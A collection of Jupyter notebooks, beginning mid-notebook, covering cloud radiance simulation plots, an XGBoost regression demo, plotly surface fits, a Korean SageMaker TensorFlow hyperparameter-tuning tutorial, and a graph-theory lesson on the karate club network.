for i, md in enumerate(np.array([1e-5, 1e-4, 1e-3])):
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.ravel()
handles += ax.plot(x, y, c = cs[j][1 + i])
labels += [r"$m = {0:.0e} kg / m^3$"
" \n"
r"$N_0^* = {1:.0e} m^{{-4}}$".format(md, n0)]
ax.set_yscale("log")
ax.set_xscale("log")
ax.set_ylim([1e0, 1e10])
ax.set_xlim([1e-5, 1e-2])
ax.set_xlabel("$D_{eq}$ [m]")
ax.set_ylabel("$dN/dD$ [$m^{-4}$]")
ax.set_title("Particle size distribution")
# Legend.
ax = plt.subplot(gs[0, 2])
ax.legend(handles = handles, labels = labels, ncol = 1, loc = "center")
ax.set_axis_off()
# Shape image.
ax = plt.subplot(gs[0, 3])
img = mi.imread(shape.img)
ax.imshow(img)
ax.set_aspect(1)
ax.set_axis_off()
ax.set_title("Particle shape")
plt.tight_layout()
```
### Ice
For ice we obviously choose a different particle shape and also modify the PSD shape a bit.
As for liquid clouds, for ice clouds it is necessary to set a **temperature maximum** for the PSD above which the PSD will be zero. The reason for this is that the scattering properties for the liquid shape are not available at low temperatures.
```
psd = D14MN(alpha = -1.0, # first shape parameter
beta = 3.0, # second shape parameter
rho = 917.0) # density [kg/m^3]
psd.t_max = 280.0
i = [s.__repr__() for s in shapes].index("LargePlateAggregate")
shape = shapes[i] # Liquid sphere
ice_cloud = ScatteringSpecies("ice_cloud", psd, shape)
import matplotlib.image as mi
import seaborn as sns
#
# Some colors.
#
sns.reset_orig()
cs = [sns.light_palette("navy", 4),
sns.light_palette("firebrick", 4),
sns.light_palette("seagreen", 4)]
#
# Figure setup
#
f = plt.figure(figsize = (12, 5))
gs = GridSpec(1, 4)
# PSD plots.
ax = plt.subplot(gs[0, 0:2])
x = np.logspace(-5, -2, 101)
handles = []
labels = []
for j, n0 in enumerate(np.array([1e6, 1e8, 1e10])):
for i, md in enumerate(np.array([1e-5, 1e-4, 1e-3])):
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.ravel()
handles += ax.plot(x, y, c = cs[j][1 + i])
labels += [r"$m = {0:.0e} kg / m^3$"
" \n"
r"$N_0^* = {1:.0e} m^{{-4}}$".format(md, n0)]
ax.set_yscale("log")
ax.set_xscale("log")
ax.set_ylim([1e0, 1e10])
ax.set_xlim([1e-5, 1e-2])
ax.set_xlabel("$D_{eq}$ [m]")
ax.set_ylabel("$dN/dD$ [$m^{-3}$]")
ax.set_title("Particle size distribution")
# Legend.
ax = plt.subplot(gs[0, 2])
ax.legend(handles = handles, labels = labels, ncol = 1, loc = "center")
ax.set_axis_off()
# Shape image.
ax = plt.subplot(gs[0, 3])
img = mi.imread(shape.img)
ax.imshow(img)
ax.set_aspect(1)
ax.set_axis_off()
ax.set_title("Particle shape")
plt.tight_layout()
```
### Cloud data
To simulate a specific cloud configuration, we need to specify the PSD parameters for each scattering species for the atmospheric column. We do this by defining a `CloudDataProvider` class that generates 1D Gaussian clouds.
```
class CloudDataProvider:
def __init__(self, name, z, mass_density = 1e-4, center = 10e3, thickness = 1e3):
self.z = z
self.mass_density = mass_density
self.center = center
self.thickness = thickness
self.name = name
self.__dict__["get_" + name + "_mass_density"] = self.get_mass_density
self.__dict__["get_" + name + "_intercept_parameter"] = self.get_intercept_parameter
def get_mass_density(self):
md = self.mass_density * np.exp(- ((z - self.center) / self.thickness) ** 2)
md[md < 1e-8] = 0.0
return md
def get_intercept_parameter(self):
return 1e8 * np.ones(z.shape)
liquid_cloud_data = CloudDataProvider("liquid_cloud", z, mass_density = 1e-4, center = 3e3)
ice_cloud_data = CloudDataProvider("ice_cloud", z, mass_density = 5e-4, center = 12e3, thickness = 1.5e3)
```
Let's plot this to see how the clouds look.
#### Liquid
```
from parts.utils.plots import plot_psds
f, axs = plt.subplots(1, 3, figsize = (10, 5))
md = liquid_cloud_data.get_liquid_cloud_mass_density()
ax = axs[0]
ax.plot(md, z / 1e3)
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e-5, 1e-3])
ax.set_ylabel("Altitude [km]")
ax.set_xlabel("Mass density [$kg / m^3$]")
ax.set_title("$Mass density$")
n0 = liquid_cloud_data.get_liquid_cloud_intercept_parameter()
ax = axs[1]
ax.plot(n0, z / 1e3)
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e5, 1e12])
ax.set_title("$N_0^*$")
ax.set_xlabel("$N_0^*$ $[m^{-4}]$")
ax.yaxis.set_ticklabels([])
x = np.logspace(-5, -2, 101)
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.T
ax = axs[2]
plot_psds(x, y[:, ::3], z[::3] / 1e3, 0.3, 0, ax)
ax.set_xlim([1e-5, 1e-2])
ax.yaxis.set_ticks([])
ax.set_title("Particle size distributions")
ax.set_xlabel("$D_{eq}$ [m]")
```
### Ice cloud
```
from parts.utils.plots import plot_psds
f, axs = plt.subplots(1, 3, figsize = (10, 5))
md = ice_cloud_data.get_ice_cloud_mass_density()
ax = axs[0]
ax.plot(md, z / 1e3, c = "C2")
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e-5, 1e-3])
ax.set_ylabel("Altitude [km]")
ax.set_xlabel("m [$kg / m^3$]")
ax.set_title("$Mass density$")
n0 = ice_cloud_data.get_ice_cloud_intercept_parameter()
ax = axs[1]
ax.plot(n0, z / 1e3, c = "C2")
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e5, 1e12])
ax.set_title("$N_0^*$")
ax.set_xlabel("$N_0^*$ $[m^{-4}]$")
ax.yaxis.set_ticklabels([])
x = np.logspace(-5, -2, 101)
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.T
ax = axs[2]
plot_psds(x, y[:, ::3], z[::3] / 1e3, 0.3, 2, ax)
ax.set_xlim([1e-5, 1e-2])
ax.yaxis.set_ticks([])
ax.set_title("Particle size distributions")
ax.set_xlabel("$D_{eq}$ [m]")
```
## Simulating cloudy-sky radiances
To simulate the cloudy atmosphere all that is left to do is:
- Add scattering species to atmosphere model
- Combine data provider for tropical background atmosphere with cloud data providers
```
from parts.data_provider import CombinedProvider
atmosphere.scatterers = [liquid_cloud, ice_cloud]
data_provider_cloudy = CombinedProvider(data_provider, liquid_cloud_data, ice_cloud_data)
```
### Run the simulation
```
simulation.data_provider = data_provider_cloudy
simulation.setup(verbosity = 0)
simulation.run()
y_ici_cloud = np.copy(ici.y)
y_mwi_cloud = np.copy(mwi.y)
y_cs_cloud = np.copy(cloud_sat.y)
```
## Results
```
from matplotlib.gridspec import GridSpec
f = plt.figure(figsize = (13, 5))
gs = GridSpec(1, 4)
handles = []
labels = []
#
# Radar
#
ax = plt.subplot(gs[0, 0])
handles += ax.plot(y_cs_clear, z_cs / 1e3, c = "C0", ls = "--")
labels += ["CloudSat, clear"]
handles += ax.plot(y_cs_cloud, z_cs / 1e3, c = "C0")
labels += ["CloudSat, cloudy"]
ax.set_xlabel("Radar reflectivity [dBz]")
ax.set_ylabel("Altitude [km]")
ax.set_title("Radar signal")
#
# Passive
#
ax = plt.subplot(gs[0, 1:3])
handles += ax.plot(f_mwi / 1e9, y_mwi_clear, c = "C1", marker = "x", ls = "--")
labels += ["MWI, clear"]
handles += ax.plot(f_mwi / 1e9, y_mwi_cloud, c = "C1", marker = "o")
labels += ["MWI, cloudy"]
handles += ax.plot(f_ici / 1e9, y_ici_clear, c = "C2", marker = "x", ls = "--")
labels += ["ICI, clear"]
handles += ax.plot(f_ici / 1e9, y_ici_cloud, c = "C2", marker = "o")
labels += ["ICI, cloudy"]
ax.set_xlabel("Frequency [GHz]")
ax.set_ylabel("$T_B$ [K]")
ax.set_title("Brightness temperatures")
#
# Legend
#
ax = plt.subplot(gs[0, -1])
ax.legend(handles = handles, labels = labels, loc = "center left")
ax.set_axis_off()
plt.tight_layout()
```
| github_jupyter |
# Example 01: General Use of XGBoostRegressor
[](https://colab.research.google.com/github/slickml/slick-ml/blob/master/examples/regression/example_01_XGBoostRegressor.ipynb)
### Google Colab Configuration
```
# !git clone https://github.com/slickml/slick-ml.git
# %cd slick-ml
# !pip install -r requirements.txt
```
### Local Environment Configuration
```
# Change path to project root
%cd ../..
```
### Import Python Libraries
```
%load_ext autoreload
# widen the screen
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# change the path and loading class
import os, sys
import pandas as pd
import numpy as np
import seaborn as sns
%autoreload
from slickml.regression import XGBoostRegressor
```
-----
# XGBoostRegressor Docstring
```
help(XGBoostRegressor)
```
## Example
```
# loading data; note this is a multi regression data
df = pd.read_csv("data/reg_data.csv")
df.head(2)
# define X, y based on one of the targets
y = df.TARGET1.values
X = df.drop(["TARGET1", "TARGET2"], axis=1)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y,
test_size=0.2,
shuffle=True,
random_state=1367)
# train a model
reg = XGBoostRegressor(num_boost_round=300,
metrics="rmsle",
sparse_matrix=False,
scale_mean=False,
scale_std=False,
importance_type=None,
params=None)
reg.fit(X_train, y_train)
# feature importrance (reg.get_feature_importance())
reg.feature_importance_
# plot feature importance
reg.plot_feature_importance()
# pred target values (or reg.y_pred_)
y_pred = reg.predict(X_test)
y_pred[:10]
# shap summary plot of validation set
reg.plot_shap_summary(validation=True)
# shap summary bar plot of validation set
reg.plot_shap_summary(plot_type="bar")
# shap summary plot (violin)
reg.plot_shap_summary(plot_type="violin")
# plot shap waterfall plot
reg.plot_shap_waterfall()
```
## You can use the RegressionMetrics class to evaluate your model
```
from slickml.metrics import RegressionMetrics
reg_metrics = RegressionMetrics(y_test, y_pred)
reg_metrics.plot()
# model's fitting params (or reg.get_params())
reg.get_params()
```
| github_jupyter |
```
import ipywidgets as widgets
from sidepanel import SidePanel
from regulus.utils import io
from regulus.models import *
from regulus.measures import *
from ipyregulus import DataWidget, TreeWidget, BaseTreeView, DetailsView
from ipyregulus.alg.view import *
gauss = io.load('data/gauss4_mc')
gauss.add_attr('quadratic', quadratic_model)
gauss.add_attr('quadratic_fitness', quadratic_fitness)
tree = TreeWidget(gauss.tree)
v1 = show_tree(tree, attr='fitness')
p1 = SidePanel(title='mc/linear')
with p1:
display(v1.view, v1.filter)
gauss.add_attr('max', node_max)
v1.view.attr = 'max'
v1.filter.attr = 'max'
v2 = show_tree(tree, attr='quadratic_fitness')
p2 = SidePanel(title='mc/quadratic')
with p2:
display(v2.view, v2.filter)
```
### MC / Details
```
data = DataWidget(data=gauss)
details = DetailsView(data=data)
widgets.link((v2.view, 'details'), (details, 'show'))
p2 = SidePanel(title='MC/details')
with p2:
display(details)
```
## Check model
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
import pandas as pd
layout = go.Layout(
title='Gauss',
autosize=False,
width=800,
height=800,
margin=dict(
l=65,
r=50,
b=65,
t=90
)
)
def surface(tree, node_id, n=25, color='rgba(217, 217, 217, 0.14)'):
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
i_sxy = tree.regulus.pts.inverse(pd.DataFrame({'x': sx, 'y': sy}))
print(f"x:[{i_sxy['x'].min()}, {i_sxy['x'].max()}], y:[{i_sxy['y'].min()}, {i_sxy['y'].max()}]")
i_xy = tree.regulus.pts.inverse(node.data.x)
surface = go.Surface(
x=i_sxy['x'], y=i_sxy['y'],
z=v
)
pts = go.Scatter3d(
x=i_xy['x'],
y=i_xy['y'],
z=node.data.y,
mode='markers',
marker=dict(
size=2,
line=dict(
color=color,
width=0.5
),
opacity=0.8
)
)
return surface, pts
def surface0(tree, node_id, n=25, color='rgba(217, 217, 217, 0.14)'):
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
surface = go.Surface(
x=sx, y=sy,
z=v
)
pts = go.Scatter3d(
x=node.data.x['x'],
y=node.data.x['y'],
z=node.data.y,
mode='markers',
marker=dict(
size=2,
line=dict(
color=color,
width=0.5
),
opacity=0.8
)
)
return surface, pts
o1 = surface(gauss.tree, 1,color='black')
o12 = surface(gauss.tree, 12, color='yellow')
o34 = surface(gauss.tree, 34, color='green')
o66 = surface(gauss.tree, 66, color='blue')
go.FigureWidget(data=o1+o12+o34+o66, layout=layout)
go.FigureWidget(data=surface0(gauss.tree,12, color='blue'), layout=layout)
node_id = 12
tree = gauss.tree
n = 20
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
p = pts.copy()
p['z'] = node.data.y
p.to_csv('data/n12.csv',index=False)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2))
v
xy = np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)
xy
pts = go.Scatter3d(
x=xy[:,0],
y=xy[:,1],
z=v,
mode='markers',
marker=dict(
size=2,
line=dict(
color='blue',
width=0.5
),
opacity=0.8
)
)
```
```
go.FigureWidget(data=[pts], layout=layout)
```
| github_jupyter |
# SageMaker Tensorflow 컨테이너를 사용하여 하이퍼파라미터 튜닝하기
## [(원본)](https://github.com/awslabs/amazon-sagemaker-examples/tree/master/hyperparameter_tuning/tensorflow_mnist)
이 문서는 **SageMaker TensorFlow container**를 사용하여 [MNIST dataset](http://yann.lecun.com/exdb/mnist/)을 훈련시키기 위해 convolutional neural network 모델을 만드는 방법에 초점을 두고 있습니다.
이것은 하이퍼파라미터 튜닝을 활용하여 서로 다른 하이퍼파라미터를 조합하여 여러 훈련 Job을 실행함으로써 최상의 모델 훈련 결과를 제공하게 됩니다.
## 환경 설정
워크플로우를 시작하기 전에 몇가지 설정이 필요합니다.
1. 훈련 데이터셋과 모델 아티펙트가 저장될 s3버킷과 prefix를 지정합니다.
2. SageMaker가 s3와 같은 리소스를 접근할 수 있도록 실행 Role을 가져옵니다.
```
import sagemaker
bucket = '<My bucket name>'#sagemaker.Session().default_bucket() # we are using a default bucket here but you can change it to any bucket in your account
prefix = 'sagemaker/DEMO-hpo-tensorflow-high' # you can customize the prefix (subfolder) here
role = sagemaker.get_execution_role() # we are using the notebook instance role for training in this example
```
이제 필요한 Python 라이브러리를 import 합니다.
```
import boto3
from time import gmtime, strftime
from sagemaker.tensorflow import TensorFlow
from sagemaker.tuner import IntegerParameter, CategoricalParameter, ContinuousParameter, HyperparameterTuner
```
## MNIST 데이터셋 다운로드하기
```
import utils
from tensorflow.contrib.learn.python.learn.datasets import mnist
import tensorflow as tf
data_sets = mnist.read_data_sets('data', dtype=tf.uint8, reshape=False, validation_size=5000)
utils.convert_to(data_sets.train, 'train', 'data')
utils.convert_to(data_sets.validation, 'validation', 'data')
utils.convert_to(data_sets.test, 'test', 'data')
```
## 데이터 업로드하기
```sagemaker.Session.upload_data``` 함수를 이용하여 S3경로에 데이터셋을 업로드합니다. 해당 함수의 리턴값은 S3의 경로를 가르킵니다. 이 경로는 훈련 Job을 시작할 때 사용할 것입니다.
```
inputs = sagemaker.Session().upload_data(path='data', bucket=bucket, key_prefix=prefix+'/data/mnist')
print (inputs)
```
## 분산 훈련을 위한 스크립트 작성하기
다음은 네트워크 모델의 전체코드입니다.
```
!cat 'mnist.py'
```
이 스크립트는 [TensorFlow MNIST example](https://github.com/tensorflow/models/tree/master/official/mnist)를 수정한 것입니다.
이것은 훈련, 평가, 추론을 위해 사용되는```model_fn(features, labels, mode)`` 를 제공합니다.
### 일반적인 ```model_fn```
일반적인 **```model_fn```** 은 다음과 같은 패턴을 따릅니다.
1. [Neural network 정의](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L96)
- [Neural network에 ```features``` 적용](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L178)
- [```mode```가 ```PREDICT``` 이면 neural network에서 output 리턴](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L186)
- [Output과 ```labels```을 비교하는 loss fuction 계산](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L188)
- [Optimizer 생성 및 neural network 개선을 위한 loss function 최소화](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L193)
- [Output, optimizer, loss function 리턴](https://github.com/tensorflow/models/blob/master/official/mnist/mnist.py#L205)
### 분산 훈련에서의 ```model_fn``` 작성
분산 훈련이 일어나면, 동일한 neural network은 여러 훈련 인스턴스로 보내집니다. 개별 인스턴스는 데이터셋의 배치를 예측하고, loss를 계산하고 optimizer를 최소화합니다. 이 프로세스의 전체 루프를 **training step** 이라고 합니다.
#### training steps 동기화
A [global step](https://www.tensorflow.org/api_docs/python/tf/train/global_step)은 인스턴스 사이에 공유되는 전역 변수입니다.
그것은 분산 훈련에서 필요하기 때문에 Optimizer는 실행되는 중간에 **training steps** 의 수를 추척합니다.
```python
train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())
```
이것이 분산훈련을 위해 필요한 유일한 변경입니다!
## 하이퍼파라미터 튜닝 Job 설정
*참고: 아래의 기본 설정에서는 하이퍼파라미터 튜닝 Job이 완료하는데 30분이 소요될 수 있습니다.*
이제 다음 단계에 따라 SageMaker Python SDK를 사용하여 하이퍼파라미터 튜닝 Job을 설정합니다.
* TensorFlow 훈련 Job 설정을 위한 estimator 생성하기
* 튜닝하려는 하이퍼파라미터 범위 정의하기. 이 예제에서는 "learning_rate"를 튜닝함
* 최적화할 튜닝 Job의 목표 메트릭 정의하기
* 위의 설정과 튜닝 Resource Configuratin으로 하이퍼파라미터 Tuner 생성
SageMaker에서 단일 TensorFlow Job을 훈련하는 것과 유사하게, TensorFlow 스크립트, IAM role, (작업별)하드웨어 구성을 전달하는 TensorFlow estimator를 정의합니다.
```
estimator = TensorFlow(entry_point='mnist.py',
role=role,
framework_version='1.12.0',
training_steps=1000,
evaluation_steps=100,
train_instance_count=1,
train_instance_type='ml.m4.xlarge',
base_job_name='DEMO-hpo-tensorflow')
```
Once we've defined our estimator we can specify the hyperparameters we'd like to tune and their possible values. We have three different types of hyperparameters.
estimator를 정의하고 나면 튜닝하려는 하이퍼파라미터과 가능한 값을 지정할 수 있습니다. 하이퍼파라미터는 세 가지 유형이 있습니다.
- 범주형 파라미터는 이산형 셋(discrete set)에서 하나의 값을 가져야 합니다. 가능한 값 목록을 `CategoricalParameter(list)`으로 전달하여 정의합니다
- 연속형 파라미터는 `ContinuousParameter(min, max)` 에서 정의한 최소값과 최대값 사이의 실수 값을 가질 수 있습니다.
- 정수형 파라미터는 `IntegerParameter(min, max)`에서 정의한 최소값과 최대값 사이의 정수 값을 가질 수 있습니다.
*참고: 가능하면 값을 최소한의 restrictive type을 지정하는 것이 거의 항상 좋습니다. 예를 들면, learning rate는 연속값으로 0.01에서 0.2로 튜닝하는 것이 0.01, 0.1, 0.15 혹은 0.2의 범주형 파라미터로 튜닝하는 것보다 더 나은 결과를 얻을 수 있습니다.*
```
hyperparameter_ranges = {'learning_rate': ContinuousParameter(0.01, 0.02)}
```
다음으로 튜닝을 위한 목표 매트릭과 그것을 정의하기 위한 설정을 진행합니다. 이것은 훈련 Job이 CloudWatch 로그로부터 매트릭을 추출하는데 필요한 정규표현식(Regex)를 포함합니다. 이 경우, 스크립트는 loss값을 방출하고 목표 매트릭은 이를 목표 매트릭으로 사용할 것입니다. 또한 최상의 하이퍼파라미터 설정을 찾을 때, 목표 매트릭을 최소화하기 하이퍼파라미터를 튜닝하기 위해 objective_type은 'minimize'로 설정합니다. default로 objective_type은 'maximize' 설정됩니다.
```
objective_metric_name = 'loss'
objective_type = 'Minimize'
metric_definitions = [{'Name': 'loss',
'Regex': 'loss = ([0-9\\.]+)'}]
```
이제 `HyperparameterTuner` 객체를 생성할 것이고, 객체에 다음 값들이 전달됩니다.:
- 위에서 생성한 TensorFlow estimator
- 하이퍼파라미터 범위
- 목표 매트릭 이름 및 정의
- 총 훈련 Job의 갯수와 병렬적으로 실행할 훈련 Job의 수와 같은 튜닝 resource configurations
```
tuner = HyperparameterTuner(estimator,
objective_metric_name,
hyperparameter_ranges,
metric_definitions,
max_jobs=9,
max_parallel_jobs=3,
objective_type=objective_type)
```
## 하이퍼파라미터 튜닝 Job 시작하기
마지막으로 `.fit()`을 호출하고 훈련 및 테스트 데이터셋의 S3 경로를 전달함에 따라 하이퍼파라미터 훈련 Job을 시작할 수 있습니다.
하이퍼파라미터 튜닝 Job이 생성된 후, 다음 단계에서 진행 상태를 보기위해 위해 튜닝 Job을 describe 할 수있어야 합니다. SageMaker의 콘솔->Jobs으로 이동하여 하이퍼파라미터의 튜닝 Job의 진행상태를 확인할 수 있습니다.
```
tuner.fit(inputs)
```
하이퍼파라미터 튜닝 Job을 간단히 체크해하여 성공적으로 시작했는지 확인하시기 바랍니다.
```
boto3.client('sagemaker').describe_hyper_parameter_tuning_job(
HyperParameterTuningJobName=tuner.latest_tuning_job.job_name)['HyperParameterTuningJobStatus']
```
## 튜닝 Job 완료 후, 결과 분석하기
튜닝 Job 결과를 분석하기 위해 "HPO_Analyze_TuningJob_Results.ipynb" 예제를 참조하십시오.
## 최상의 모델 배포하기
이제 최상의 모델을 얻었으며, endpoint에서 배포할 수 있습니다. 모델을 배포하는 방법은 SageMaker sample notebook이나 SageMaker documentation을 참고하시기 바랍니다.
| github_jupyter |
<div style="width: 100%; overflow: hidden;">
<div style="width: 150px; float: left;"> <img src="data/D4Sci_logo_ball.png" alt="Data For Science, Inc" align="left" border="0"> </div>
<div style="float: left; margin-left: 10px;"> <h1>Graphs and Networks</h1>
<h2>Lesson II - Graph Properties</h2>
<p>Bruno Gonçalves<br/>
<a href="http://www.data4sci.com/">www.data4sci.com</a><br/>
@bgoncalves, @data4sci</p></div>
</div>
```
from collections import Counter
from pprint import pprint
import numpy as np
import matplotlib.pyplot as plt
import watermark
%load_ext watermark
%matplotlib inline
```
We start by print out the versions of the libraries we're using for future reference
```
%watermark -n -v -m -g -iv
```
Load default figure style
```
plt.style.use('./d4sci.mplstyle')
```
# Graph class
We now integrate our prefered graph representation into a class that we can build on. For now we provide it with just placeholders for our data
```
class Graph:
def __init__(self, directed=False):
self._nodes = {}
self._edges = {}
self._directed = directed
```
For ease of explanation, we will be adding methods to this class as we progress. To allow for this in a convenient way, we must declare a Python decorator that will be in charge of modifying the class as we implement further functionality
Understanding this function is not important for the scope of the lecture, but if you are curious, you cna find more information on [Decorators](https://www.python.org/dev/peps/pep-0318/) and [setattr](https://docs.python.org/3/library/functions.html#setattr) in the offical Python documentation
```
def add_method(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
```
We can already instanciate our skeleton class
```
G = Graph()
```
and verify that it has nothing hiding inside other than the default Python methods and the fields we defined
```
dir(G)
```
## Nodes
Now we add our first utility methors. *add_node* will be responsible for adding a single node to the Graph, while *add_nodes_from* will prove useful to add nodes in bulk. We can also add node attributes by passing keyword arguments to any of these two functions
```
@add_method(Graph)
def add_node(self, node, **kwargs):
self._nodes[node] = kwargs
@add_method(Graph)
def add_nodes_from(self, nodes, **kwargs):
for node in nodes:
if isinstance(node, tuple):
self._nodes[node[0]] = node[1:]
else:
self._nodes[node] = kwargs
@add_method(Graph)
def nodes(self):
return list(self._nodes.keys())
```
And we can now check that this added functionality is now available to our Graph
```
dir(G)
```
And that they work as promised
```
G.add_node("A", color="blue")
```
And naturally
```
G._nodes
```
Or, for a more complex example:
```
G.add_node("Z", color="green", size=14)
G._nodes
```
*add_nodes_from* treats the first parameter as an iterable. This means that we can pass a string and it will add a node for each character.
```
G.add_nodes_from("ABC", color='red')
G._nodes
```
Here it is important to note 2 things:
- Since add_nodes_from expects the first argument to be a list of nodes, it treated each character of the string as an individual node
- By adding the same node twice we overwrite the previous version.
# Edges
Now we add the equivalent functionality for edges.
```
@add_method(Graph)
def add_edge(self, node_i, node_j, **kwargs):
if node_i not in self._nodes:
self.add_node(node_i)
if node_j not in self._nodes:
self.add_node(node_j)
if node_i not in self._edges:
self._edges[node_i] = {}
if node_j not in self._edges[node_i]:
self._edges[node_i][node_j] = {}
self._edges[node_i][node_j] = kwargs
if not self._directed:
if node_j not in self._edges:
self._edges[node_j] = {}
if node_i not in self._edges[node_j]:
self._edges[node_j][node_i] = {}
self._edges[node_j][node_i] = kwargs
@add_method(Graph)
def add_edges_from(self, edges, **kwargs):
for edge in edges:
self.add_edge(*edge, **kwargs)
```
Before we proceed, let us create a new Graph object
```
G = Graph()
G._directed
```
And add the edges from the edge list we considered before
```
edge_list = [
('A', 'B'),
('A', 'C'),
('A', 'E'),
('B', 'C'),
('C', 'D'),
('C', 'E'),
('D', 'E')]
G.add_edges_from(edge_list)
```
And we can easily check that it looks correct, both for nodes and edges
```
G._nodes
G._edges
```
For Completeness, we add a function to return a list of all the edges and their attributes (if any)
```
@add_method(Graph)
def edges(self, node_i=None):
e = []
if node_i is None:
edges = self._edges
else:
edges = [node_i]
for node_i in edges:
for node_j in self._edges[node_i]:
e.append([node_i, node_j, self._edges[node_i][node_j]])
return e
```
So we recover the undirected version of the edge list we started with
```
G.edges()
```
## Graph properties
Now that we have a minimally functional Graph object, we can start implementing functionality to retrieve information about the Graph.
### Node information
Obtaining the number of nodes is simple enough:
```
@add_method(Graph)
def number_of_nodes(self):
return len(self._nodes)
```
So we confirm that we have 5 nodes as expected
```
G.number_of_nodes()
```
And to retrieve the degree of each node one must simply check the number of corresponding entries in the edge dictionary
```
@add_method(Graph)
def degrees(self):
deg = {}
for node in self._nodes:
if node in self._edges:
deg[node] = len(self._edges[node])
else:
deg[node] = 0
return deg
```
With the expected results
```
G.degrees()
```
### Edge Information
The number of edges is simply given by:
```
@add_method(Graph)
def number_of_edges(self):
n_edges = 0
for node_i in self._edges:
n_edges += len(self._edges[node_i])
# If the graph is undirected, don't double count the edges
if not self._directed:
n_edges /= 2
return n_edges
```
And so we find, as expected
```
G.number_of_edges()
```
We also add a conveniency method to check if the graph id directed
```
@add_method(Graph)
def is_directed(self):
return self._directed
G.is_directed()
```
### Weights
As we saw, each edge can potentially have a weight associated with it (it defaults to 1). We also provide a function to recover a dictionary mapping edges to weights
```
@add_method(Graph)
def weights(self, weight="weight"):
w = {}
for node_i in self._edges:
for node_j in self._edges[node_i]:
if weight in self._edges[node_i][node_j]:
w[(node_i, node_j)] = self._edges[node_i][node_j][weight]
else:
w[(node_i, node_j)] = 1
return w
```
As we didn't explicitly include any weight information in our graph, we find that all the weights are 1
```
G._edges['A']['B']['weight']=4
G._edges
G.weights()
```
### Topology and Correlations
One particularly useful property of a graph is the list of nearest neighbors of a given node. With our formulation, this is particularly simple to implement
```
@add_method(Graph)
def neighbours(self, node):
if node in self._edges:
return list(self._edges[node].keys())
else:
return []
```
So we find that node $C$ has as nearest neighbours nodes $A$, $B$, $D$, $E$
```
G.neighbours('C')
```
We are also intersted in the degree and weight distributions. Before we can compute them, we define a utility function to generate a probability distribution from a dictionary of values
```
@add_method(Graph)
def _build_distribution(data, normalize=True):
values = data.values()
dist = list(Counter(values).items())
dist.sort(key=lambda x:x[0])
dist = np.array(dist, dtype='float')
if normalize:
norm = dist.T[1].sum()
dist.T[1] /= norm
return dist
```
By default the probability distribution is normalized such that the sum of all values is 1. Using this utility function it is now easy to calculate the degree distribution
```
@add_method(Graph)
def degree_distribution(self, normalize=True):
deg = self.degrees()
dist = Graph._build_distribution(deg, normalize)
return dist
```
The degree distribution for our Graph is then:
```
G.degree_distribution(False)
```
Where we can see that we have 2 nodes of both degree 2 and 3 and 1 of degree 4.
Similarly, for the weight distribution
```
@add_method(Graph)
def weight_distribution(self, normalize=True):
deg = self.weights()
dist = Graph._build_distribution(deg, normalize)
return dist
```
And we naturally find that all of our edges have weight 1.
```
G.weight_distribution()
```
We now calculate the average degree of the nearest neighbours for each node.
```
@add_method(Graph)
def neighbour_degree(self):
knn = {}
deg = self.degrees()
for node_i in self._edges:
NN = self.neighbours(node_i)
total = [deg[node_j] for node_j in NN]
knn[node_i] = np.mean(total)
return knn
G.neighbour_degree()
```
And the distribution by degree:
```
@add_method(Graph)
def neighbour_degree_function(self):
knn = {}
count = {}
deg = self.degrees()
for node_i in self._edges:
NN = self.neighbours(node_i)
total = [deg[node_j] for node_j in NN]
curr_k = deg[node_i]
knn[curr_k] = knn.get(curr_k, 0) + np.mean(total)
count[curr_k] = count.get(curr_k, 0) + 1
for curr_k in knn:
knn[curr_k]/=count[curr_k]
knn = list(knn.items())
knn.sort(key=lambda x:x[0])
return np.array(knn)
```
From which we obtain:
```
G.neighbour_degree_function()
```
# Zachary Karate Club
J. Anthro. Res. 33, 452 (1977)
Let's now look at an empirical Graph
For convenience, we load the data from a file using numpy
```
edges = np.loadtxt('data/karate.txt')
edges[:10]
```
Now we can use the functions defined above to generate the corresponding graph
```
Karate = Graph()
Karate.add_edges_from(edges)
```
Our graph has 34 nodes
```
Karate.number_of_nodes()
```
And 78 edges
```
Karate.number_of_edges()
```
The degree distribution is:
```
Pk = Karate.degree_distribution()
Pk
```
Which we can plot easily
```
plt.plot(Pk.T[0], Pk.T[1])
plt.xlabel('k')
plt.ylabel('P[k]')
